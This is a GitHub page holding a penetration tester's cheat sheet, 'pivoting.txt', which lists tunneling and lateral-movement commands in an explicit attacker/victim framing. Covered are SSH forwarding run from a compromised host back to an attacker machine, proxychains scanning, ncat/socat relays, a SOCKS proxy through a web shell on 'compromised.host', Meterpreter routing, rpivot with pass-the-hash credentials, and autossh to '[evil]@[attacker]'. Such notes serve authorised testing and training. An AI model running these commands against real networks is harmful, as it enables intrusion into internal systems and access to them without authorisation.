forked from ThePacketBender/notes
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpivoting.txt
More file actions
121 lines (100 loc) · 4.1 KB
/
pivoting.txt
File metadata and controls
121 lines (100 loc) · 4.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
PIVOTING
Forwarding
SSH tunneling
static port forwarding
local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
ssh 192.168.1.2 -p 53 -L 8080:100.10.11.1:80
sshd_addr endpoint: web_addr :httport
ssh>http://127.0.0.1:8080
-assume atacker running sshd on port 53
-Once the tunnel is created, we browse to local port 8080, which redirects our traffic
-through the outbound SSH tunnel on TCP port 53 on our home machine, then to the
-web server.
remote(/reverse) port fowarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
target: ssh 192.168.1.2 -p 53 -R 3390:127.0.0.01:3389
attacker: rdesktop 127.0.0.1:3390
-From the penetrated internal machine, you create a reverse SSH tunnel with your
-attacking machine, through which you expose the victim’s RDP port on your attacking
-machine on port 3390
dynamic port forwarding
ssh -D 8080 -p 22000 10.11.1.252
proxychains
victim machine(shell)
ssh -f -N -R 2222:127.0.0.1:22 root@10.11.0.207
ssh -f -N -D 127.0.0.1:8080 -p 2222 root@127.0.0.1
attacker machine
proxychains nmap --top-ports=100 -sT -Pn 192.168.1.1/24
sshuttle
sshuttle -r username@sshserver 0.0.0.0/0
sshuttle --dns -r username@sshserver 0/0
HTTP Tunneling
nc -nvv 10.11.1.15 8888
CONNECT 10.11.1.15:80 HTTP/1.0
HEAD / HTTP/1.0
encapsulation:
httptunnel
stunnel
Servers
nano $(locate /rinted.conf\n)
# bindadress bindport connectaddress connectport
192.168.1.2 53 10.11.1.24 80
awk '/#\<bindadress\<bindport\<connectaddress\<connectport/ {for i=1; i<=2; i++}'
netcat
ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443"
-Port forwarding using ncat
LISTEN
ncat -v -l -p 8080 -c "ncat -v -l -p 9090" #localhost
ncat localhost -p 8080 < file #remote host
ncat localhost 9090 > newfile #remote host
-Netcat Pivot host
socat -v tcp-listen:8080 tcp-listen:9090 #localhost
-socat pivot host
LISTEN - CONNECT
ncat -l -v -p 8080 -c "ncat localhost 9090" #localhost
socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090 #localhost
ncat localhost -p 8080 < file #remote host
ncat localhost -lp 9090 > newfile #remote host
CONNECT
ncat localhost 8080 -c "ncat localhost 9090" #localhost
socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090 #localhost
ncat localhost -p 8080 < file #remote host
ncat localhost -lp 9090 > newfile #remote host
Build port relay, Windows 7+
netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>
Web Shell SOCKS Proxy
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
Metasploit
meterpreter>run autoroute -s 192.168.5.1/24
meterpreter>run autoroute -p
msfconsole>use auxiliary/server/socks4a
set SRVPORT 8080
exploit
portfwd add -L 127.0.0.1 -l 3389 -r 192.168.1.111 -p 3389
-orward rdesktop sessions from localhost port 3389 to the target 192.168.1.111 through Meterpreter as a tunnel
Rpivot
https://github.com/artkond/rpivot
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0 #attacker
python client.py --server-ip <ip> --server-port 9443 #victim
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
-through corporate/enterprise proxy
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] --ntlm-proxy-port 8080 --domain CORP --username jdoe --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
-pass-the-hash
AutoSSH
http://www.harding.motd.ca/autossh/
http://www.harding.motd.ca/autossh/autossh-1.4f.tgz
checksum: http://www.harding.motd.ca/autossh/autossh-1.4f.cksums
autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 2222:localhost:22 [evil]@[attacker]
VNC over SSH Tunnel
tightvncserver -geometry 1024x768
ssh -L 5901:localhost:5901 -i .ssh/ssh.key -N -f user@192.168.2.111
SSH over HTTP (SQUID)
socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.111:127.0.0.1:22,proxyport=3128
ssh user@127.0.0.1 -p 9999
proxytunnel
proxytunnel -p 192.168.1.111:3128 -d 127.0.0.1:22 -a 5555
ssh user@127.0.0.1 -p 5555
Scanning:
FTP Bounce
Idle Scan